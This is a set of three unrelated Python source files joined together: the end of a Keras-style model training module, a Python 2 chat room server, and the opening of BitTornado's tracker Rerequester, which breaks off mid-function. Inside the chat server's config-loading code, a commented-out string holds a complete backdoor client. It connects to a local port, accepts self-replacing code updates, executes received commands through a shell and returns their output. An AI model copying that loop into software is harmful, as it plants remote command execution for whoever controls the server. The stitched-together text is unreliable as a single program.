callbacks.on_train_end()
return self.history
def _predict_loop(self, f, ins, batch_size=32, verbose=0):
'''Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Array of prections (if the model has a single output)
or list of arrays of predictions
(if the model has multiple outputs).
'''
nb_sample = len(ins[0])
outs = []
if verbose == 1:
progbar = Progbar(target=nb_sample)
batches = make_batches(nb_sample, batch_size)
index_array = np.arange(nb_sample)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if type(ins[-1]) is float:
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
batch_outs = f(ins_batch)
if type(batch_outs) != list:
batch_outs = [batch_outs]
if batch_index == 0:
for batch_out in batch_outs:
shape = (nb_sample,) + batch_out.shape[1:]
outs.append(np.zeros(shape))
for i, batch_out in enumerate(batch_outs):
outs[i][batch_start:batch_end] = batch_out
if verbose == 1:
progbar.update(batch_end)
if len(outs) == 1:
return outs[0]
return outs
def _test_loop(self, f, ins, batch_size=32, verbose=0):
'''Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Scalar loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
nb_sample = len(ins[0])
outs = []
if verbose == 1:
progbar = Progbar(target=nb_sample)
batches = make_batches(nb_sample, batch_size)
index_array = np.arange(nb_sample)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if type(ins[-1]) is float:
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
batch_outs = f(ins_batch)
if type(batch_outs) == list:
if batch_index == 0:
for batch_out in enumerate(batch_outs):
outs.append(0.)
for i, batch_out in enumerate(batch_outs):
outs[i] += batch_out * len(batch_ids)
else:
if batch_index == 0:
outs.append(0.)
outs[0] += batch_outs * len(batch_ids)
if verbose == 1:
progbar.update(batch_end)
for i, out in enumerate(outs):
outs[i] /= nb_sample
if len(outs) == 1:
return outs[0]
return outs
def _standardize_user_data(self, x, y,
sample_weight=None, class_weight=None,
check_batch_dim=True, batch_size=None):
if not hasattr(self, 'optimizer'):
raise Exception('You must compile a model before training/testing.'
' Use `model.compile(optimizer, loss)`.')
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes,
check_batch_dim=False,
exception_prefix='model input')
y = standardize_input_data(y, self.output_names,
self.internal_output_shapes,
check_batch_dim=False,
exception_prefix='model target')
sample_weights = standardize_sample_weights(sample_weight,
self.output_names)
class_weights = standardize_class_weights(class_weight,
self.output_names)
sample_weights = [standardize_weights(ref, sw, cw, mode)
for (ref, sw, cw, mode)
in zip(y, sample_weights, class_weights, self.sample_weight_modes)]
check_array_lengths(x, y, sample_weights)
check_loss_and_target_compatibility(y, self.loss_functions, self.internal_output_shapes)
if self.stateful and batch_size:
if x[0].shape[0] % batch_size != 0:
raise Exception('In a stateful network, '
'you should only pass inputs with '
'a number of samples that can be '
'divided by the batch size. Found: ' +
str(x[0].shape[0]) + ' samples')
return x, y, sample_weights
def fit(self, x, y, batch_size=32, nb_epoch=10, verbose=1, callbacks=[],
validation_split=0., validation_data=None, shuffle=True,
class_weight=None, sample_weight=None):
'''Trains the model for a fixed number of epochs (iterations on a dataset).
# Arguments
x: Numpy array of training data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
batch_size: integer. Number of samples per gradient update.
nb_epoch: integer, the number of times to iterate over the training data arrays.
verbose: 0, 1, or 2. Verbosity mode. 0 = silent, 1 = verbose, 2 = one log line per epoch.
callbacks: list of callbacks to be called during training.
See [callbacks](/callbacks).
validation_split: float between 0 and 1:
fraction of the training data to be used as validation data.
The model will set apart this fraction of the training data,
will not train on it, and will evaluate the loss and any model metrics
on this data at the end of each epoch.
validation_data: data on which to evaluate the loss and any model metrics
at the end of each epoch. The model will not be trained on this data.
This could be a tuple (x_val, y_val) or a tuple (val_x, val_y, val_sample_weights).
shuffle: boolean, whether to shuffle the training data before each epoch.
class_weight: optional dictionary mapping classe indices (integers) to
a weight (float) to apply to the model's loss for the samples
from this class during training.
This can be useful to tell the model to "pay more attention" to
samples from an under-represented class.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify sample_weight_mode="temporal" in compile().
# Returns
A `History` instance. Its `history` attribute contains
all information collected during training.
'''
# validate user data
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
class_weight=class_weight,
check_batch_dim=False,
batch_size=batch_size)
# prepare validation data
if validation_data:
do_validation = True
if len(validation_data) == 2:
val_x, val_y = validation_data
val_sample_weight = None
elif len(validation_data) == 3:
val_x, val_y, val_sample_weight = validation_data
else:
raise
val_x, val_y, val_sample_weights = self._standardize_user_data(val_x, val_y,
sample_weight=val_sample_weight,
check_batch_dim=False,
batch_size=batch_size)
self._make_test_function()
val_f = self.test_function
if self.uses_learning_phase:
val_ins = val_x + val_y + val_sample_weights + [0.]
else:
val_ins = val_x + val_y + val_sample_weights
elif validation_split and 0. < validation_split < 1.:
do_validation = True
split_at = int(len(x[0]) * (1. - validation_split))
x, val_x = (slice_X(x, 0, split_at), slice_X(x, split_at))
y, val_y = (slice_X(y, 0, split_at), slice_X(y, split_at))
sample_weights, val_sample_weights = (slice_X(sample_weights, 0, split_at), slice_X(sample_weights, split_at))
self._make_test_function()
val_f = self.test_function
if self.uses_learning_phase:
val_ins = val_x + val_y + val_sample_weights + [0.]
else:
val_ins = val_x + val_y + val_sample_weights
else:
do_validation = False
val_f = None
val_ins = None
# prepare input arrays and training function
if self.uses_learning_phase:
ins = x + y + sample_weights + [1.]
else:
ins = x + y + sample_weights
self._make_train_function()
f = self.train_function
# prepare display labels
out_labels = self.metrics_names
if do_validation:
callback_metrics = copy.copy(out_labels) + ['val_' + n for n in out_labels]
else:
callback_metrics = copy.copy(out_labels)
# delegate logic to _fit_loop
return self._fit_loop(f, ins, out_labels=out_labels,
batch_size=batch_size, nb_epoch=nb_epoch,
verbose=verbose, callbacks=callbacks,
val_f=val_f, val_ins=val_ins, shuffle=shuffle,
callback_metrics=callback_metrics)
def evaluate(self, x, y, batch_size=32, verbose=1, sample_weight=None):
'''Returns the loss value and metrics values for the model
in test mode. Computation in done in batches.
# Arguments
x: Numpy array of test data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
batch_size: integer. Number of samples per gradient update.
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
# validate user data
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
check_batch_dim=False,
batch_size=batch_size)
# prepare inputs, delegate logic to _test_loop
if self.uses_learning_phase:
ins = x + y + sample_weights + [0.]
else:
ins = x + y + sample_weights
self._make_test_function()
f = self.test_function
return self._test_loop(f, ins,
batch_size=batch_size,
verbose=verbose)
def predict(self, x, batch_size=32, verbose=0):
'''Generates output predictions for the input samples,
processing the samples in a batched way.
# Arguments
x: the input data, as a Numpy array
(or list of Numpy arrays if the model has multiple outputs).
batch_size: integer.
verbose: verbosity mode, 0 or 1.
# Returns
A Numpy array of predictions.
'''
# validate user data
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes,
check_batch_dim=False)
if self.stateful:
if x[0].shape[0] > batch_size and x[0].shape[0] % batch_size != 0:
raise Exception('In a stateful network, '
'you should only pass inputs with '
'a number of samples that can be '
'divided by the batch size. Found: ' +
str(x[0].shape[0]) + ' samples. '
'Batch size: ' + str(batch_size) + '.')
# prepare inputs, delegate logic to _predict_loop
if self.uses_learning_phase:
ins = x + [0.]
else:
ins = x
self._make_predict_function()
f = self.predict_function
return self._predict_loop(f, ins,
batch_size=batch_size, verbose=verbose)
def train_on_batch(self, x, y,
sample_weight=None, class_weight=None):
'''Runs a single gradient update on a single batch of data.
# Arguments
x: Numpy array of training data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify sample_weight_mode="temporal" in compile().
class_weight: optional dictionary mapping classe indices (integers) to
a weight (float) to apply to the model's loss for the samples
from this class during training.
This can be useful to tell the model to "pay more attention" to
samples from an under-represented class.
# Returns
Scalar training loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
class_weight=class_weight,
check_batch_dim=True)
if self.uses_learning_phase:
ins = x + y + sample_weights + [1.]
else:
ins = x + y + sample_weights
self._make_train_function()
outputs = self.train_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def test_on_batch(self, x, y, sample_weight=None):
'''Test the model on a single batch of samples.
# Arguments
x: Numpy array of test data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify sample_weight_mode="temporal" in compile().
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
check_batch_dim=True)
if self.uses_learning_phase:
ins = x + y + sample_weights + [0.]
else:
ins = x + y + sample_weights
self._make_test_function()
outputs = self.test_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def predict_on_batch(self, x):
'''Returns predictions for a single batch of samples.
'''
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes)
if self.uses_learning_phase:
ins = x + [0.]
else:
ins = x
self._make_predict_function()
outputs = self.predict_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def fit_generator(self, generator, samples_per_epoch, nb_epoch,
verbose=1, callbacks=[],
validation_data=None, nb_val_samples=None,
class_weight={}, max_q_size=10):
'''Fits the model on data generated batch-by-batch by
a Python generator.
The generator is run in parallel to the model, for efficiency.
For instance, this allows you to do real-time data augmentation
on images on CPU in parallel to training your model on GPU.
# Arguments
generator: a generator.
The output of the generator must be either
- a tuple (inputs, targets)
- a tuple (inputs, targets, sample_weights).
All arrays should contain the same number of samples.
The generator is expected to loop over its data
indefinitely. An epoch finishes when `samples_per_epoch`
samples have been seen by the model.
samples_per_epoch: integer, number of samples to process before
going to the next epoch.
nb_epoch: integer, total number of iterations on the data.
verbose: verbosity mode, 0, 1, or 2.
callbacks: list of callbacks to be called during training.
validation_data: this can be either
- a generator for the validation data
- a tuple (inputs, targets)
- a tuple (inputs, targets, sample_weights).
nb_val_samples: only relevant if `validation_data` is a generator.
number of samples to use from validation generator
at the end of every epoch.
class_weight: dictionary mapping class indices to a weight
for the class.
max_q_size: maximum size for the generator queue
# Returns
A `History` object.
# Example
```python
def generate_arrays_from_file(path):
while 1:
f = open(path)
for line in f:
# create numpy arrays of input data
# and labels, from each line in the file
x1, x2, y = process_line(line)
yield ({'input_1': x1, 'input_2': x2}, {'output': y})
f.close()
model.fit_generator(generate_arrays_from_file('/my_file.txt'),
samples_per_epoch=10000, nb_epoch=10)
```
'''
wait_time = 0.01 # in seconds
epoch = 0
do_validation = bool(validation_data)
self._make_train_function()
if do_validation:
self._make_test_function()
# python 2 has 'next', 3 has '__next__'
# avoid any explicit version checks
val_gen = (hasattr(validation_data, 'next') or
hasattr(validation_data, '__next__'))
if val_gen and not nb_val_samples:
raise Exception('When using a generator for validation data, '
'you must specify a value for "nb_val_samples".')
out_labels = self.metrics_names
callback_metrics = out_labels + ['val_' + n for n in out_labels]
# prepare callbacks
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + callbacks + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
# it's possible to callback a different model than self:
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks._set_model(callback_model)
callbacks._set_params({
'nb_epoch': nb_epoch,
'nb_sample': samples_per_epoch,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics,
})
callbacks.on_train_begin()
if do_validation and not val_gen:
if len(validation_data) == 2:
val_x, val_y = validation_data
val_sample_weight = None
elif len(validation_data) == 3:
val_x, val_y, val_sample_weight = validation_data
else:
raise Exception('validation_data should be a tuple '
'(val_x, val_y, val_sample_weight) '
'or (val_x, val_y). Found: ' + str(validation_data))
val_x, val_y, val_sample_weights = self._standardize_user_data(val_x, val_y, val_sample_weight)
self.validation_data = val_x + [val_y, val_sample_weights]
else:
self.validation_data = None
# start generator thread storing batches into a queue
data_gen_queue, _stop = generator_queue(generator, max_q_size=max_q_size)
callback_model.stop_training = False
while epoch < nb_epoch:
callbacks.on_epoch_begin(epoch)
samples_seen = 0
batch_index = 0
while samples_seen < samples_per_epoch:
generator_output = None
while not _stop.is_set():
if not data_gen_queue.empty():
generator_output = data_gen_queue.get()
break
else:
time.sleep(wait_time)
if not hasattr(generator_output, '__len__'):
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
# build batch logs
batch_logs = {}
if type(x) is list:
batch_size = len(x[0])
elif type(x) is dict:
batch_size = len(list(x.values())[0])
else:
batch_size = len(x)
batch_logs['batch'] = batch_index
batch_logs['size'] = batch_size
callbacks.on_batch_begin(batch_index, batch_logs)
try:
outs = self.train_on_batch(x, y,
sample_weight=sample_weight,
class_weight=class_weight)
except Exception as e:
_stop.set()
raise
if type(outs) != list:
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
# construct epoch logs
epoch_logs = {}
batch_index += 1
samples_seen += batch_size
# epoch finished
if samples_seen > samples_per_epoch:
warnings.warn('Epoch comprised more than '
'`samples_per_epoch` samples, '
'which might affect learning results. '
'Set `samples_per_epoch` correctly '
'to avoid this warning.')
if samples_seen >= samples_per_epoch and do_validation:
if val_gen:
val_outs = self.evaluate_generator(validation_data,
nb_val_samples,
max_q_size=max_q_size)
else:
# no need for try/except because
# data has already been validated
val_outs = self.evaluate(val_x, val_y,
sample_weight=val_sample_weights,
verbose=0)
if type(val_outs) is not list:
val_outs = [val_outs]
# same labels assumed
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
epoch += 1
if callback_model.stop_training:
break
_stop.set()
callbacks.on_train_end()
return self.history
def evaluate_generator(self, generator, val_samples, max_q_size=10):
'''Evaluates the model on a data generator. The generator should
return the same kind of data as accepted by `test_on_batch`.
Arguments:
generator:
generator yielding tuples (inputs, targets)
or (inputs, targets, sample_weights)
val_samples:
total number of samples to generate from `generator`
before returning.
max_q_size: maximum size for the generator queue
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
self._make_test_function()
processed_samples = 0
wait_time = 0.01
all_outs = []
weights = []
data_gen_queue, _stop = generator_queue(generator, max_q_size=max_q_size)
while processed_samples < val_samples:
generator_output = None
while not _stop.is_set():
if not data_gen_queue.empty():
generator_output = data_gen_queue.get()
break
else:
time.sleep(wait_time)
if not hasattr(generator_output, '__len__'):
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
try:
outs = self.test_on_batch(x, y, sample_weight=sample_weight)
except Exception as e:
_stop.set()
raise
if type(x) is list:
nb_samples = len(x[0])
elif type(x) is dict:
nb_samples = len(list(x.values())[0])
else:
nb_samples = len(x)
all_outs.append(outs)
processed_samples += nb_samples
weights.append(nb_samples)
_stop.set()
if type(outs) is not list:
return np.average(np.asarray(all_outs),
weights=weights)
else:
averages = []
for i in range(len(outs)):
averages.append(np.average([out[i] for out in all_outs],
weights=weights))
return averages
def predict_generator(self, generator, val_samples, max_q_size=10):
'''Generates predictions for the input samples from a data generator.
The generator should return the same kind of data as accepted by
`predict_on_batch`.
# Arguments
generator: generator yielding batches of input samples.
val_samples: total number of samples to generate from `generator`
before returning.
max_q_size: maximum size for the generator queue
# Returns
Numpy array(s) of predictions.
'''
self._make_predict_function()
processed_samples = 0
wait_time = 0.01
all_outs = []
data_gen_queue, _stop = generator_queue(generator, max_q_size=max_q_size)
while processed_samples < val_samples:
generator_output = None
while not _stop.is_set():
if not data_gen_queue.empty():
generator_output = data_gen_queue.get()
break
else:
time.sleep(wait_time)
if isinstance(generator_output, tuple):
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
else:
x = generator_output
try:
outs = self.predict_on_batch(x)
except Exception as e:
_stop.set()
raise
if type(x) is list:
nb_samples = len(x[0])
elif type(x) is dict:
nb_samples = len(list(x.values())[0])
else:
nb_samples = len(x)
if type(outs) != list:
outs = [outs]
if len(all_outs) == 0:
for out in outs:
shape = (val_samples,) + out.shape[1:]
all_outs.append(np.zeros(shape))
for i, out in enumerate(outs):
all_outs[i][processed_samples:(processed_samples + nb_samples)] = out
processed_samples += nb_samples
_stop.set()
if len(all_outs) == 1:
return all_outs[0]
return all_outs
|
ChatRoom1.0Server.py | #!/usr/bin/env python
# -.- coding: utf-8 -.-y
import threading
import Queue
import socket
import time
import sys
import os
from cmd import Cmd
#Created by Camerin Figueroa
cv = "1.0"
q = Queue.Queue()
q.put([])
errors = Queue.Queue()
errors.put([])
motd = Queue.Queue()
quit = Queue.Queue()
quit.put("")
mesg = Queue.Queue()
mesg.put("")
online = Queue.Queue()
online.put([])
print """\33[91m
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโ โโโโโโ โโโโโโโ
โ โ โ โ โ
โ โโโโโโ โ โโโ โ
โโโโโโโโโโโโโโโ โโ โโโโโโ
โ โโโโโโ โโ
โ โ โ โโโ โโโโโโโโServer
โโโโโโโโโโ โ โ โโโ โ
โโโโโโโ โ โ โ โโโโโโโ
Chat Room Clientโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
\33[92m"""
port = 99999
configcont = "#Replace Everything behind = sign\n#Ex before: config = edit\n#Ex after: config = configinput\n\nmotd = Hello world This is a new Chat Room Server made by Camerin Figueroa\nport = 22550\n"
if os.path.isfile('./crsconfig.txt') == True:
f = open('./crsconfig.txt', 'r')
#configuration = 'import socket\nimport os\nimport time\nimport subprocess\nimport sys\ncv = "1.0"\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_address = (\'127.0.0.1\', 65021)\nsock.connect(server_address)\nrcv = sock.recv(128)\nsock.send(cv)\ncid = sock.recv(1024)\nif cid == "newver":\n print "initiating update"\n output = sock.recv(1024)\n print output\n if output == "tb:2":\n print "tb2"\n output1 = sock.recv(1024)\n output2 = sock.recv(1024)\n output = output1 + output2\n elif output == "tb:3":\n print "tb3"\n output1 = sock.recv(1024)\n output2 = sock.recv(1024)\n output3 = sock.recv(1024)\n output = output1 + output2 + output3\n else:\n print "tb1"\n output = sock.recv(1024)\n path = os.path.realpath(__file__)\n f = open(path, \'w\')\n f.write(output)\n f.close()\n os.system("python " + path + " &")\n sys.exit()\nelse:\n pass\nprint cid\nwhile True:\n try:\n sock.send("Ping")\n data = sock.recv(1024)\n cmd = data\n print "Running " + cmd\n if " " in data:\n cmd.split(" ")\n output = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True).communicate()[0]\n else:\n output = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True).communicate()[0]\n sock.send(cid + ":" + output)\n except:\n pass\n time.sleep(20)\nsock.close()\n'
configuration = f.read()
f.close()
configuration = configuration.split("\n")
for line in configuration:
if "motd =" in line:
motd.put(line[10:])
else:
pass
if "port = " in line:
port = int(line[7:])
else:
pass
else:
f = open('./crsconfig.txt', 'w')
f.write(configcont)
f.close()
print "Please edit crsconfig.txt"
sys.exit()
if port != 99999:
pass
else:
f = open('./crsconfig.txt', 'w')
f.write(configcont)
f.close()
print "Please edit crsconfig.txt"
sys.exit()
def console(q, errors, motd):
if __name__ == '__main__':
prompt = consoleprompt()
prompt.prompt = '> '
prompt.cmdloop('Starting prompt...')
class consoleprompt(Cmd):
def do_printdb(self, args):
global q
self.quit = quit
db = q.get()
q.put(db)
for line in db:
for lin in line:
print lin
def do_online(self, args):
global online
on = online.get()
online.put(on)
print "Online:"
for username in on:
print username
def do_printerrors(self, args):
global errors
erlist = errors.get()
errors.put(erlist)
print "Errors:"
for error in erlist:
print error
def do_motd(self, args):
if "-c" in args:
global motd
oldmotd = motd.get()
motd.put(args[3:])
print "motd changed from " + oldmotd + " to " + args[3:]
else:
print "add -c newcmd"
def do_quit(self, args):
global quit
print "Quitting."
quit.get()
quit.put("quitting:")
time.sleep(2)
os._exit(0)
class Server(object):
def __init__(self, host, port, q, motd, errors, mesg, quit, online):
self.motd = motd
self.quit = quit
self.errors = errors
self.host = host
self.port = port
self.q = q
self.mesg = mesg
self.online = online
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.host, self.port))
def listen(self):
self.sock.listen(5)
while True:
client, address = self.sock.accept()
client.settimeout(10)
#threading.Thread(target = self.sendcid,args = (client,address)).start()
#global clientdb
threading.Thread(target = self.listenToClient,args = (client,address)).start()
def listenToClient(self, client, address):
global cv
cmd = self.motd.get()
self.motd.put(cmd)
#global clientdb
rcv = client.recv(128)
if str(cv) != rcv[3:] and "cv:" in rcv:
client.send("comp:0:" + str(cv))
elif rcv == "screen:":
online = self.online.get()
self.online.put(online)
client.send(str(online))
cmessage = self.mesg.get()
self.mesg.put(cmessage)
lm = cmessage
tick = 0
qi = False
try:
while qi == False:
cmessage = self.mesg.get()
self.mesg.put(cmessage)
online = self.online.get()
self.online.put(online)
if cmessage != lm:
client.send(cmessage)
lm = cmessage
else:
pass
quit = self.quit.get()
self.quit.put(quit)
if tick == 1000:
client.send("online:" + str(online))
onlinecheck = client.recv(1024)
if onlinecheck == "quitting:":
quit = "quitting:"
qi = True
else:
pass
tick = 0
else:
pass
tick = tick + 1
if quit == "quitting:":
client.send("quitting:")
client.close()
qi = True
else:
pass
time.sleep(.001)
except:
print "Screen Error"
pass
else:
client.send("comp:1")
name = client.recv(1024)
if "user:" not in name:
client.send("error:wrong type of packet received. 'user:' was not within the packet")
erlist = errors.get()
erlist.append(client.getpeername() + ":wrong type of packet received. 'user:' was not within the packet")
errors.put(erlist)
else:
name = name[5:]
used = False
online = self.online.get()
self.online.put(online)
for user in online:
if user == name:
used = True
else:
pass
if used == True:
client.send("error:Username has already been used before.")
client.close()
erlist = errors.get()
erlist.append(name + ":" + name + ":Username has already been used before.")
errors.put(erlist)
check = False
else:
client.send("user:" + name)
check = True
if check == True:
db = q.get()
q.put(db)
leng = 0
for nam in db:
if name == nam[0]:
nl = leng
else:
leng = leng + 1
if 'nl' in locals():
pass
else:
nl = leng
db.append([name,])
q.get()
q.put(db)
try:
online = self.online.get()
online.append(name)
self.online.put(online)
while True:
rmesg = client.recv(1024)
if "" == rmesg:
pass
elif "/help" == rmesg:
pass
elif "quitting:" == rmesg:
on = online.get()
on.remove(name)
online.put(on)
elif "ping:" == rmesg:
pass
else:
db = q.get()
db[leng].append(name + ":" + rmesg[5:])
q.put(db)
self.mesg.get()
self.mesg.put(name + ":" + rmesg[5:])
except:
online = self.online.get()
if name in online:
online.remove(name)
else:
pass
self.online.put(online)
else:
pass
def writeoutput(q, errors):
while True:
try:
time.sleep(10)
tta = q.get()
q.put(tta)
error = errors.get()
errors.put(error)
fw = "Users:\n"
errs = ""
for err in error:
errs = errs + err + "\n"
for line in tta:
for lin in line:
fw = fw + str(lin) + "\n"
fw = fw + "โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ\nErrors:\n" + errs
f = open("crs.log", 'w')
f.write(fw)
f.close()
except:
error = errors.get()
error.append("Error while writing output\n")
errors.put(error)
if __name__ == "__main__":
threading.Thread(target = writeoutput,args = (q,errors)).start()
threading.Thread(target = console,args = (q, errors, motd)).start()
Server('',port,q,motd,errors,mesg, quit, online).listen()
|
Rerequester.py | # Written by Bram Cohen
# modified for multitracker operation by John Hoffman
# see LICENSE.txt for license information
from BitTornado.zurllib import urlopen
from urllib import quote
from btformats import check_peers
from BitTornado.bencode import bdecode
from threading import Thread, Lock
from cStringIO import StringIO
from traceback import print_exc
from socket import error, gethostbyname
from random import shuffle
from sha import sha
from time import time
try:
from os import getpid
except ImportError:
def getpid():
return 1
try:
True
except:
True = 1
False = 0
mapbase64 = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz.-'
keys = {}
basekeydata = str(getpid()) + repr(time()) + 'tracker'
def add_key(tracker):
key = ''
for i in sha(basekeydata+tracker).digest()[-6:]:
key += mapbase64[ord(i) & 0x3F]
keys[tracker] = key
def get_key(tracker):
try:
return "&key="+keys[tracker]
except:
add_key(tracker)
return "&key="+keys[tracker]
class fakeflag:
def __init__(self, state=False):
self.state = state
def wait(self):
pass
def isSet(self):
return self.state
class Rerequester:
def __init__(self, trackerlist, interval, sched, howmany, minpeers,
connect, externalsched, amount_left, up, down,
port, ip, myid, infohash, timeout, errorfunc, excfunc,
maxpeers, doneflag, upratefunc, downratefunc,
unpauseflag = fakeflag(True)):
self.excfunc = excfunc
newtrackerlist = []
for tier in trackerlist:
if len(tier) > 1:
shuffle(tier)
newtrackerlist += [tier]
self.trackerlist = newtrackerlist
self.lastsuccessful = ''
self.rejectedmessage = 'rejected by tracker - '
self.url = ('?info_hash=%s&peer_id=%s&port=%s' %
(quote(infohash), quote(myid), str(port)))
self.ip = ip
self.interval = interval
self.last = None
self.trackerid = None
self.announce_interval = 30 * 60
self.sched = sched
self.howmany = howmany
self.minpeers = minpeers
self.connect = connect
self.externalsched = externalsched
self.amount_left = amount_left
self.up = up
self.down = down
self.timeout = timeout
self.errorfunc = errorfunc
self.maxpeers = maxpeers
self.doneflag = doneflag
self.upratefunc = upratefunc
self.downratefunc = downratefunc
self.unpauseflag = unpauseflag
self.last_failed = True
self.never_succeeded = True
self.errorcodes = {}
self.lock = SuccessLock()
self.special = None
self.stopped = False
def start(self):
self.sched(self.c, self.interval/2)
self.d(0)
def c(self):
if self.stopped:
return
if not self.unpauseflag.isSet() and self.howmany() < self.minpeers:
self.announce(3, self._c)
else:
self._c()
def _c(self):
self.sched(self.c, self.interval)
def d(self, event = 3):
if self.stopped:
return
if not self.unpauseflag.isSet():
self._d()
return
self.announce(event, self._d)
def _d(self):
if self.never_succeeded:
self.sched(self.d, 60) # retry in 60 seconds
else:
self.sched(self.d, self.announce_interval)
def announce(self, event = 3, callback = lambda: None, specialurl = None):
if specialurl is not None:
s = self.url+'&uploaded=0&downloaded=0&left=1' # don't add to statistics
if self.howmany() >= self.maxpeers:
s += '&numwant=0'
else:
s += '&no_peer_id=1&compact=1'
self.last_failed = True # force true, so will display an error
self.special = specialurl
self.rerequest(s, callback)
return
else:
s = ('%s&uploaded=%s&downloaded=%s&left=%s' %
(self.url, str(self.up()), str(self.down()),
str(self.amount_left())))
if self.last is not None:
s += '&last=' + quote(str(self.last))
if self.trackerid is not None:
s += '&trackerid=' + quote(str(self.trackerid))
if self.howmany() >= self.maxpeers:
s += '&numwant=0'
else:
s += '&no_peer_id=1&compact=1'
if event != 3:
